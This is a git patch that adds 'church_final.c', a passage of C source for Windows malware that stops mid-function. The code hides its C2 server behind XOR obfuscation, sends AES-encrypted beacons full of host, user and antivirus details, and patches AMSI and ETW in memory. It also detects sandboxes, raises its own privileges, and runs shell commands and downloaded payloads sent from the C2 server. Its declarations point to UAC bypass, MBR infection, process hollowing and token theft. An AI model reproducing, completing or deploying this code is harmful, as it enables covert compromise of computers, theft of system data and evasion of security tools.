From a5cf84c276983a7cf5f286a8fffc2a6c77230ee5 Mon Sep 17 00:00:00 2001 From: ek0ms savi0r Date: Mon, 1 Jun 2026 03:30:56 +0000 Subject: [PATCH] Upload files to "/" --- church_final.c | 1303 ++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1303 insertions(+) create mode 100644 church_final.c diff --git a/church_final.c b/church_final.c new file mode 100644 index 0000000..8bcbeb4 --- /dev/null +++ b/church_final.c @@ -0,0 +1,1303 @@ +#define _CRT_SECURE_NO_WARNINGS +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "advapi32.lib") +#pragma comment(lib, "user32.lib") +#pragma comment(lib, "wbemuuid.lib") +#pragma comment(lib, "ole32.lib") +#pragma comment(lib, "crypt32.lib") +#pragma comment(lib, "ntdll.lib") +#pragma comment(lib, "bcrypt.lib") +#pragma comment(lib, "ws2_32.lib") +#pragma comment(lib, "winhttp.lib") +#pragma comment(lib, "iphlpapi.lib") +#pragma comment(lib, "shlwapi.lib") +#pragma comment(lib, "shell32.lib") + +// ==================== XOR OBFUSCATION ==================== +#define XOR_KEY 0xDD + +VOID ObfuscateStr(PCHAR buf, SIZE_T len) { + for (SIZE_T i = 0; i < len; i++) buf[i] ^= XOR_KEY; +} + +// Obfuscated C2 server - https://your-c2-server.com/beacon (XORed) +CHAR g_c2_server_obf[] = "\x78\x9D\x9D\x9A\x9B\x9C\xA9\xE1\x9B\xA9\x9B\x9A\xA9\x96\x9A\x9B\x9C\xA9\xB6\x9B\x98\x9C\xA9\xA9\xE9\xA9\x98\x9A\x9C\x9B\x98\xA9\x98\x99\x9A\x9B\x9C"; +CHAR g_aes_key_obf[] = "\xAB\xAA\xA8\xA3\xA7\xB6\xA8\xF5\xA8\xB3\xB4\xA8\xAB\xAA\xA8\xA3\xA7\xB6\xA8\xF5\xA8\xB3\xB4\xA8\xAA\xA5\xB1\xA7\xA5\xAD\xB4\x23"; +CHAR g_aes_iv_obf[] = "\xB1\xB8\xB7\xAF\xB2\xB9\xA5\xA7\xA8\xB9\xA7\xA6\xF5\xF4\xF4\x23"; +CHAR g_mutex_name_obf[] = "\x9A\x9D\x9A\x9D\x9A\x8F\x9A\x9D\x9A\x9D\x9A\x8F\x9A\x9D\x9A\x9D\x23"; + +CHAR g_c2_server[256] = {0}; +CHAR g_aes_key[64] = {0}; +CHAR g_aes_iv[32] = {0}; +CHAR g_mutex_name[64] = {0}; + +VOID InitObfuscatedStrings() { + CHAR tmp[256]; + memcpy(tmp, g_c2_server_obf, sizeof(g_c2_server_obf)); + ObfuscateStr(tmp, sizeof(g_c2_server_obf) - 1); + strncpy(g_c2_server, tmp, 255); + memcpy(tmp, g_aes_key_obf, sizeof(g_aes_key_obf)); + ObfuscateStr(tmp, sizeof(g_aes_key_obf) - 1); + strncpy(g_aes_key, tmp, 63); + memcpy(tmp, g_aes_iv_obf, sizeof(g_aes_iv_obf)); + ObfuscateStr(tmp, sizeof(g_aes_iv_obf) - 1); + strncpy(g_aes_iv, tmp, 31); + memcpy(tmp, g_mutex_name_obf, sizeof(g_mutex_name_obf)); + ObfuscateStr(tmp, sizeof(g_mutex_name_obf) - 1); + strncpy(g_mutex_name, tmp, 63); +} + +// ==================== CONSTANTS ==================== +#define C2_BASE_INTERVAL_SECONDS 60 +#define C2_JITTER_MAX_SECONDS 120 +#define GDRV_DEVICE_NAME L"\\\\.\\GIO" +#define GDRV_IOCTL_READ_MSR 0x9C402470 +#define GDRV_IOCTL_WRITE_MSR 0x9C402474 +#define GDRV_IOCTL_READ_PHYSICAL 0x9C402478 +#define GDRV_IOCTL_WRITE_PHYSICAL 0x9C40247C +#define IA32_EFER 0xC0000080 +#define CI_OPTIONS_DISABLE_DSE 0x6 +#define ETW_EVENT_WRITE_HASH 0x1B7E0F38 +#define AMSI_SCAN_BUFFER_HASH 0x1B7E0F37 + +// ==================== STRUCTURES ==================== +typedef struct _BEACON_DATA { + WCHAR ComputerName[MAX_COMPUTERNAME_LENGTH + 1]; + WCHAR UserName[256]; + DWORD ProcessId; + WCHAR OSVersion[128]; + BOOL IsAdmin; + WCHAR ExePath[MAX_PATH]; + DWORD DefenderStatus; + DWORD Uptime; + DWORD InstallDate; + DWORD LastBootTime; + WCHAR AntivirusProduct[256]; + WCHAR DomainName[256]; +} BEACON_DATA, *PBEACON_DATA; + +typedef struct _C2_TASK { + DWORD TaskId; + WCHAR Command[1024]; + WCHAR Arguments[2048]; + BOOL IsPowerShell; + BOOL WaitForOutput; + BOOL IsDownload; + WCHAR DownloadURL[1024]; + WCHAR DownloadPath[MAX_PATH]; +} C2_TASK, *PC2_TASK; + +typedef struct _PS_PROTECTION { + UCHAR Level; +} PS_PROTECTION, *PPS_PROTECTION; + +typedef struct _C2_ENDPOINT { + WCHAR host[128]; + WCHAR path[128]; + INTERNET_PORT port; +} C2_ENDPOINT; + +typedef struct _KERNEL_MODULE_INFO { + ULONGLONG Base; + ULONGLONG Size; + CHAR Name[256]; +} KERNEL_MODULE_INFO, *PKERNEL_MODULE_INFO; + +typedef enum _PROCESSINFOCLASS { + ProcessProtectionInformation = 0x3D, + ProcessHandleInformation = 0x51 +} PROCESSINFOCLASS; + +typedef struct _SYSTEM_HANDLE_ENTRY { + ULONG OwnerPid; + BYTE ObjectType; + BYTE HandleFlags; + USHORT HandleValue; + PVOID ObjectPointer; + ACCESS_MASK GrantedAccess; +} SYSTEM_HANDLE_ENTRY, *PSYSTEM_HANDLE_ENTRY; + +typedef struct _SYSTEM_HANDLE_INFORMATION { + ULONG Count; + SYSTEM_HANDLE_ENTRY Handle[1]; +} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; + +typedef NTSTATUS (NTAPI *pNtSetInformationProcess)(HANDLE, DWORD, PVOID, ULONG); +typedef NTSTATUS (NTAPI *pNtQueryInformationProcess)(HANDLE, DWORD, PVOID, ULONG, PULONG); +typedef NTSTATUS (NTAPI *pNtQuerySystemInformation)(DWORD, PVOID, ULONG, PULONG); +typedef NTSTATUS (NTAPI *pNtDuplicateObject)(HANDLE, HANDLE, HANDLE, PHANDLE, ACCESS_MASK, ULONG, ULONG); +typedef NTSTATUS (NTAPI *pNtSuspendProcess)(HANDLE); +typedef NTSTATUS (NTAPI *pNtResumeProcess)(HANDLE); +typedef NTSTATUS (NTAPI *pNtReadVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG); +typedef NTSTATUS (NTAPI *pNtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG); + +// ==================== GLOBALS ==================== +C2_ENDPOINT g_C2Fallbacks[5] = {0}; +int g_C2Count = 0; +int g_C2Current = 0; +HANDLE g_hMutex = NULL; +pNtQuerySystemInformation NtQuerySystemInformation = NULL; +pNtDuplicateObject NtDuplicateObject = NULL; +pNtSuspendProcess NtSuspendProcess = NULL; +pNtResumeProcess NtResumeProcess = NULL; +pNtReadVirtualMemory NtReadVirtualMemory = NULL; +pNtWriteVirtualMemory NtWriteVirtualMemory = NULL; + +// ==================== FORWARD DECLARATIONS ==================== +ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen); +ULONGLONG WalkPageTable(PVOID virtualAddr); +BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen); +BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen); +BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task); +DWORD WINAPI BeaconThread(LPVOID lpParam); +BOOL PatchAmsi(void); +BOOL PatchEtw(void); +BOOL IsSandboxed(void); +BOOL EnableDebugPrivilege(void); +BOOL KillProcessByName(LPCWSTR processName); +BOOL HideFile(LPCWSTR filePath); +BOOL ClearEventLogs(void); +BOOL AddToStartup(LPCWSTR appPath); +BOOL ExecuteWMIQuery(LPCWSTR query, BSTR* result); +BOOL BypassUAC(void); +BOOL InstallServicePersistence(void); +BOOL InfectMbr(BYTE* payload, DWORD payloadSize); +BOOL CreateRegistryKey(LPCWSTR keyPath, LPCWSTR valueName, DWORD valueData); +BOOL DeleteRegistryKey(LPCWSTR keyPath); +BOOL DisableFirewall(void); +BOOL AddExclusionToDefender(LPCWSTR path); +BOOL EnumSecurityProducts(WCHAR* output, DWORD outputSize); +BOOL SelfDelete(void); +BOOL ProcessHollowing(LPCWSTR targetProcess, LPCWSTR payloadPath); +BOOL TokenStealing(void); +BOOL RunPE(BYTE* peData, DWORD peSize); +BOOL DownloadFile(LPCWSTR url, LPCWSTR outputPath); +BOOL ExecuteCommand(PC2_TASK task, WCHAR* output, DWORD outputSize); + +// ==================== NT FUNCTION INITIALIZATION ==================== +VOID InitNtFunctions() { + HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); + if (hNtdll) { + NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"); + NtDuplicateObject = (pNtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject"); + NtSuspendProcess = (pNtSuspendProcess)GetProcAddress(hNtdll, "NtSuspendProcess"); + NtResumeProcess = (pNtResumeProcess)GetProcAddress(hNtdll, "NtResumeProcess"); + NtReadVirtualMemory = (pNtReadVirtualMemory)GetProcAddress(hNtdll, "NtReadVirtualMemory"); + NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory"); + } +} + +// ==================== SINGLE INSTANCE ==================== +BOOL EnsureSingleInstance() { + HANDLE hMutex = CreateMutexW(NULL, TRUE, (LPCWSTR)g_mutex_name); + if (GetLastError() == ERROR_ALREADY_EXISTS) { + if (hMutex) CloseHandle(hMutex); + return FALSE; + } + g_hMutex = hMutex; + return TRUE; +} + +// ==================== DEBUG PRIVILEGE ==================== +BOOL EnableDebugPrivilege() { + HANDLE hToken; + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) + return FALSE; + TOKEN_PRIVILEGES tp; + LUID luid; + if (!LookupPrivilegeValueW(NULL, SE_DEBUG_NAME, &luid)) { + CloseHandle(hToken); + return FALSE; + } + tp.PrivilegeCount = 1; + tp.Privileges[0].Luid = luid; + tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + BOOL result = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); + CloseHandle(hToken); + return result; +} + +// ==================== UTILITY ==================== +void ElevateSelf() { + BOOL isElevated = FALSE; + HANDLE hToken = NULL; + if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { + TOKEN_ELEVATION elev; + DWORD size = sizeof(TOKEN_ELEVATION); + if (GetTokenInformation(hToken, TokenElevation, &elev, size, &size)) + isElevated = elev.TokenIsElevated; + CloseHandle(hToken); + } + if (!isElevated) { + wchar_t exePath[MAX_PATH]; + GetModuleFileNameW(NULL, exePath, MAX_PATH); + SHELLEXECUTEINFOW sei = { sizeof(sei) }; + sei.lpVerb = L"runas"; + sei.lpFile = exePath; + sei.nShow = SW_HIDE; + if (ShellExecuteExW(&sei)) ExitProcess(0); + else ExitProcess(1); + } +} + +// ==================== AMSI BYPASS ==================== +BOOL PatchAmsi() { + HMODULE hAmsi = GetModuleHandleW(L"amsi.dll"); + if (!hAmsi) return FALSE; + FARPROC pAmsiScanBuf = GetProcAddress(hAmsi, "AmsiScanBuffer"); + if (!pAmsiScanBuf) return FALSE; + BYTE patch[] = { 0xB8, 0x00, 0x00, 0x00, 0x00, 0xC3 }; + DWORD oldProtect; + if (!VirtualProtect(pAmsiScanBuf, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect)) + return FALSE; + memcpy(pAmsiScanBuf, patch, sizeof(patch)); + VirtualProtect(pAmsiScanBuf, sizeof(patch), oldProtect, &oldProtect); + FlushInstructionCache(GetCurrentProcess(), pAmsiScanBuf, sizeof(patch)); + return TRUE; +} + +// ==================== ETW BYPASS ==================== +BOOL PatchEtw() { + HMODULE hNtDll = GetModuleHandleW(L"ntdll.dll"); + if (!hNtDll) return FALSE; + FARPROC pEtwEventWrite = GetProcAddress(hNtDll, "EtwEventWrite"); + if (!pEtwEventWrite) return FALSE; + BYTE patch[] = { 0x31, 0xC0, 0xC3 }; + DWORD oldProtect; + if (!VirtualProtect(pEtwEventWrite, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect)) + return FALSE; + memcpy(pEtwEventWrite, patch, sizeof(patch)); + VirtualProtect(pEtwEventWrite, sizeof(patch), oldProtect, &oldProtect); + FlushInstructionCache(GetCurrentProcess(), pEtwEventWrite, sizeof(patch)); + return TRUE; +} + +// ==================== SANDBOX DETECTION ==================== +BOOL IsSandboxed() { + ULARGE_INTEGER freeBytes, totalBytes; + if (GetDiskFreeSpaceExW(L"C:\\", &freeBytes, &totalBytes, NULL)) { + if (totalBytes.QuadPart < 64424509440ULL) return TRUE; + } + MEMORYSTATUSEX memStatus = { sizeof(memStatus) }; + if (GlobalMemoryStatusEx(&memStatus)) { + if (memStatus.ullTotalPhys < 4294967296ULL) return TRUE; + } + WCHAR computerName[MAX_COMPUTERNAME_LENGTH + 1]; + DWORD size = MAX_COMPUTERNAME_LENGTH + 1; + if (GetComputerNameW(computerName, &size)) { + LPCWSTR names[] = { L"SANDBOX", L"VIRUS", L"MALWARE", L"TEST", L"WIN-", L"7SILVER", L"CODER", L"DEBUG", L"ANALYSIS" }; + for (int i = 0; i < 9; i++) { + if (wcsstr(computerName, names[i])) return TRUE; + } + } + if (GetTickCount64() < 600000) return TRUE; + SYSTEM_POWER_STATUS power; + GetSystemPowerStatus(&power); + if (power.BatteryFlag != 128) return TRUE; + if (IsDebuggerPresent()) return TRUE; + return FALSE; +} + +// ==================== C2 FALLBACK PARSING ==================== +VOID ParseC2Server() { + CHAR* hostStart = strstr(g_c2_server, "://"); + if (!hostStart) return; + hostStart += 3; + size_t len = strlen(hostStart); + for (size_t i = 0; i < len && i < 127; i++) { + g_C2Fallbacks[0].host[i] = (WCHAR)hostStart[i]; + } + g_C2Fallbacks[0].port = INTERNET_DEFAULT_HTTPS_PORT; + wcscpy(g_C2Fallbacks[0].path, L"/beacon"); + g_C2Count = 1; + wcscpy(g_C2Fallbacks[1].host, L"cloudflare-dns.com"); + g_C2Fallbacks[1].port = 443; + wcscpy(g_C2Fallbacks[1].path, L"/dns-query"); + wcscpy(g_C2Fallbacks[2].host, L"dns.google"); + g_C2Fallbacks[2].port = 443; + wcscpy(g_C2Fallbacks[2].path, L"/resolve"); + g_C2Count = 3; +} + +// ==================== CRYPTOGRAPHY ==================== +BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen) { + BCRYPT_ALG_HANDLE hAlg = NULL; + BCRYPT_KEY_HANDLE hKey = NULL; + if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) + return FALSE; + BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0); + BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, strlen(g_aes_key), 0); + DWORD paddedLen = ((plaintextLen + 15) / 16) * 16; + *ciphertextLen = paddedLen + 16; + *ciphertext = (BYTE*)malloc(*ciphertextLen); + if (!*ciphertext) { BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); return FALSE; } + NTSTATUS status = BCryptEncrypt(hKey, plaintext, plaintextLen, NULL, (PUCHAR)g_aes_iv, strlen(g_aes_iv), *ciphertext, *ciphertextLen, ciphertextLen, BCRYPT_BLOCK_PADDING); + BCryptDestroyKey(hKey); + BCryptCloseAlgorithmProvider(hAlg, 0); + return BCRYPT_SUCCESS(status); +} + +BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen) { + BCRYPT_ALG_HANDLE hAlg = NULL; + BCRYPT_KEY_HANDLE hKey = NULL; + if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) + return FALSE; + BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0); + BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, strlen(g_aes_key), 0); + *plaintextLen = ciphertextLen; + *plaintext = (BYTE*)malloc(*plaintextLen + 1); + if (!*plaintext) return FALSE; + NTSTATUS status = BCryptDecrypt(hKey, ciphertext, ciphertextLen, NULL, (PUCHAR)g_aes_iv, strlen(g_aes_iv), *plaintext, *plaintextLen, plaintextLen, BCRYPT_BLOCK_PADDING); + BCryptDestroyKey(hKey); + BCryptCloseAlgorithmProvider(hAlg, 0); + if (BCRYPT_SUCCESS(status)) (*plaintext)[*plaintextLen] = 0; + return BCRYPT_SUCCESS(status); +} + +// ==================== BEACON DATA ==================== +void GatherBeaconData(PBEACON_DATA beacon) { + DWORD size = MAX_COMPUTERNAME_LENGTH + 1; + GetComputerNameW(beacon->ComputerName, &size); + DWORD userSize = 256; + GetUserNameW(beacon->UserName, &userSize); + beacon->ProcessId = GetCurrentProcessId(); + beacon->IsAdmin = IsUserAnAdmin(); + GetModuleFileNameW(NULL, beacon->ExePath, MAX_PATH); + beacon->Uptime = GetTickCount64() / 1000; + + RTL_OSVERSIONINFOW osvi = { sizeof(osvi) }; + RtlGetVersion(&osvi); + swprintf(beacon->OSVersion, 128, L"%d.%d.%d Build %d", osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.dwBuildNumber, osvi.dwBuildNumber); + + HKEY hKey; + beacon->DefenderStatus = 2; + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { + DWORD value = 0, valueSize = sizeof(value); + RegQueryValueExW(hKey, L"DisableRealtimeMonitoring", NULL, NULL, (LPBYTE)&value, &valueSize); + beacon->DefenderStatus = value; + RegCloseKey(hKey); + } + + // Get Windows install date + HKEY hKeySetup; + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, KEY_READ, &hKeySetup) == ERROR_SUCCESS) { + DWORD installDate = 0; + DWORD dataSize = sizeof(installDate); + RegQueryValueExW(hKeySetup, L"InstallDate", NULL, NULL, (LPBYTE)&installDate, &dataSize); + beacon->InstallDate = installDate; + RegCloseKey(hKeySetup); + } + + // Get domain name + DWORD domainSize = 256; + GetComputerNameExW(ComputerNameDnsDomain, beacon->DomainName, &domainSize); + if (wcslen(beacon->DomainName) == 0) wcscpy(beacon->DomainName, L"WORKGROUP"); + + // Get antivirus products + EnumSecurityProducts(beacon->AntivirusProduct, 256); +} + +BOOL EnumSecurityProducts(WCHAR* output, DWORD outputSize) { + output[0] = 0; + HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); + if (FAILED(hr)) return FALSE; + IWbemLocator* pLoc = NULL; + IWbemServices* pSvc = NULL; + hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc); + if (SUCCEEDED(hr)) { + hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\SecurityCenter2"), NULL, NULL, 0, NULL, 0, 0, &pSvc); + if (SUCCEEDED(hr)) { + hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE); + IEnumWbemClassObject* pEnumerator = NULL; + hr = pSvc->ExecQuery(bstr_t("WQL"), bstr_t("SELECT * FROM AntiVirusProduct"), WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator); + if (SUCCEEDED(hr) && pEnumerator) { + IWbemClassObject* pclsObj = NULL; + ULONG uReturn = 0; + while (pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn) == S_OK) { + VARIANT vtProp; + if (SUCCEEDED(pclsObj->Get(L"displayName", 0, &vtProp, 0, 0))) { + wcsncat(output, vtProp.bstrVal, outputSize - wcslen(output) - 1); + wcsncat(output, L"; ", outputSize - wcslen(output) - 1); + VariantClear(&vtProp); + } + pclsObj->Release(); + } + pEnumerator->Release(); + } + pSvc->Release(); + } + pLoc->Release(); + } + CoUninitialize(); + return wcslen(output) > 0; +} + +// ==================== USER AGENT POOL ==================== +LPCWSTR UAPool[] = { + L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/125.0.0.0 Safari/537.36", + L"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", + L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0", + L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/126.0.0.0 Safari/537.36", + L"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0", + L"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", + L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" +}; + +// ==================== C2 COMMUNICATION ==================== +BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task) { + char json[8192]; + snprintf(json, sizeof(json), + "{\"computer\":\"%ls\",\"user\":\"%ls\",\"pid\":%d,\"os\":\"%ls\"," + "\"admin\":%s,\"path\":\"%ls\",\"defender\":%d,\"uptime\":%d," + "\"install_date\":%d,\"domain\":\"%ls\",\"av\":\"%ls\"}", + beacon->ComputerName, beacon->UserName, beacon->ProcessId, + beacon->OSVersion, beacon->IsAdmin ? "true" : "false", + beacon->ExePath, beacon->DefenderStatus, beacon->Uptime, + beacon->InstallDate, beacon->DomainName, beacon->AntivirusProduct); + + BYTE* encrypted = NULL; + DWORD encryptedLen = 0; + if (!AesEncrypt((BYTE*)json, strlen(json), &encrypted, &encryptedLen)) return FALSE; + + DWORD base64Len = 0; + CryptBinaryToStringA(encrypted, encryptedLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &base64Len); + char* b64 = (char*)malloc(base64Len + 1); + if (!b64) { free(encrypted); return FALSE; } + CryptBinaryToStringA(encrypted, encryptedLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64, &base64Len); + + int uaIndex = rand() % (sizeof(UAPool) / sizeof(UAPool[0])); + BOOL result = FALSE; + + for (int c2try = 0; c2try < max(1, g_C2Count); c2try++) { + int idx = (g_C2Current + c2try) % max(1, g_C2Count); + HINTERNET hSession = WinHttpOpen(UAPool[uaIndex], WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); + if (!hSession) continue; + + DWORD secFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID; + WinHttpSetOption(hSession, WINHTTP_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags)); + + HINTERNET hConnect = WinHttpConnect(hSession, g_C2Fallbacks[idx].host, g_C2Fallbacks[idx].port, 0); + if (!hConnect) { WinHttpCloseHandle(hSession); continue; } + + HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", g_C2Fallbacks[idx].path, NULL, NULL, NULL, WINHTTP_FLAG_SECURE); + if (!hRequest) { WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); continue; } + + char postData[8192]; + snprintf(postData, sizeof(postData), "d=%s", b64); + + if (WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded", 0, (LPVOID)postData, strlen(postData), strlen(postData), 0)) { + if (WinHttpReceiveResponse(hRequest, NULL)) { + char response[16384] = {0}; + DWORD bytesRead = 0; + WinHttpReadData(hRequest, response, sizeof(response) - 1, &bytesRead); + char* body = strstr(response, "\r\n\r\n"); + if (body) body += 4; else body = response; + if (strlen(body) > 0) { + BYTE* decrypted = NULL; + DWORD decryptedLen = 0; + if (AesDecrypt((BYTE*)body, (DWORD)strlen(body), &decrypted, &decryptedLen)) { + char* taskIdStr = strstr((char*)decrypted, "\"task_id\""); + if (taskIdStr) { + char* valStart = strchr(taskIdStr, ':'); + if (valStart) { + valStart++; while (*valStart == ' ' || *valStart == '\"') valStart++; + int taskId = atoi(valStart); + if (taskId != 0) { + char* cmdStr = strstr((char*)decrypted, "\"command\""); + if (cmdStr) { + valStart = strchr(cmdStr, ':'); + if (valStart) { + valStart++; while (*valStart == ' ' || *valStart == '\"') valStart++; + char* end = strchr(valStart, '\"'); + if (end) *end = 0; + MultiByteToWideChar(CP_UTF8, 0, valStart, -1, task->Command, 1024); + task->TaskId = taskId; + task->WaitForOutput = TRUE; + } + } + char* downloadStr = strstr((char*)decrypted, "\"download\""); + if (downloadStr) { + task->IsDownload = TRUE; + char* urlStart = strchr(downloadStr, ':'); + if (urlStart) { + urlStart++; while (*urlStart == ' ' || *urlStart == '\"') urlStart++; + char* urlEnd = strchr(urlStart, '\"'); + if (urlEnd) *urlEnd = 0; + MultiByteToWideChar(CP_UTF8, 0, urlStart, -1, task->DownloadURL, 1024); + wcscpy(task->DownloadPath, L"C:\\Windows\\Temp\\payload.exe"); + } + } + } + } + } + free(decrypted); + } + } + result = TRUE; + } + } + WinHttpCloseHandle(hRequest); + WinHttpCloseHandle(hConnect); + WinHttpCloseHandle(hSession); + if (result) { g_C2Current = (idx + 1) % max(1, g_C2Count); break; } + } + free(encrypted); + free(b64); + return result; +} + +// ==================== DOWNLOAD AND EXECUTE ==================== +BOOL DownloadFile(LPCWSTR url, LPCWSTR outputPath) { + HINTERNET hSession = WinHttpOpen(L"Church/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); + if (!hSession) return FALSE; + HINTERNET hConnect = WinHttpConnect(hSession, url, INTERNET_DEFAULT_HTTPS_PORT, 0); + if (!hConnect) { WinHttpCloseHandle(hSession); return FALSE; } + HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"GET", NULL, NULL, NULL, NULL, WINHTTP_FLAG_SECURE); + if (!hRequest) { WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return FALSE; } + if (!WinHttpSendRequest(hRequest, NULL, 0, NULL, 0, 0, 0)) { + WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); + return FALSE; + } + if (!WinHttpReceiveResponse(hRequest, NULL)) { + WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); + return FALSE; + } + HANDLE hFile = CreateFileW(outputPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hFile == INVALID_HANDLE_VALUE) { + WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); + return FALSE; + } + DWORD bytesRead = 0; + BYTE buffer[4096]; + while (WinHttpReadData(hRequest, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) { + DWORD bytesWritten; + WriteFile(hFile, buffer, bytesRead, &bytesWritten, NULL); + } + CloseHandle(hFile); + WinHttpCloseHandle(hRequest); + WinHttpCloseHandle(hConnect); + WinHttpCloseHandle(hSession); + return TRUE; +} + +// ==================== COMMAND EXECUTION ==================== +BOOL ExecuteCommand(PC2_TASK task, WCHAR* output, DWORD outputSize) { + if (task->IsDownload && task->DownloadURL[0] != 0) { + if (DownloadFile(task->DownloadURL, task->DownloadPath)) { + PROCESS_INFORMATION pi; + STARTUPINFOW si = { sizeof(si) }; + CreateProcessW(task->DownloadPath, NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) CloseHandle(pi.hProcess); + if (pi.hThread) CloseHandle(pi.hThread); + wcscpy(output, L"Download and execution completed"); + return TRUE; + } + wcscpy(output, L"Download failed"); + return FALSE; + } + + SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE }; + HANDLE hStdOutRead, hStdOutWrite; + if (!CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0)) return FALSE; + SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0); + PROCESS_INFORMATION pi = {0}; + STARTUPINFOW si = {0}; + si.cb = sizeof(si); + si.dwFlags = STARTF_USESTDHANDLES; + si.hStdOutput = hStdOutWrite; + si.hStdError = hStdOutWrite; + si.hStdInput = NULL; + WCHAR cmdLine[4096]; + if (task->IsPowerShell) { + swprintf(cmdLine, 4096, L"powershell.exe -Command \"%s %s\"", task->Command, task->Arguments); + } else { + swprintf(cmdLine, 4096, L"cmd.exe /c %s %s", task->Command, task->Arguments); + } + BOOL success = CreateProcessW(NULL, cmdLine, NULL, NULL, TRUE, 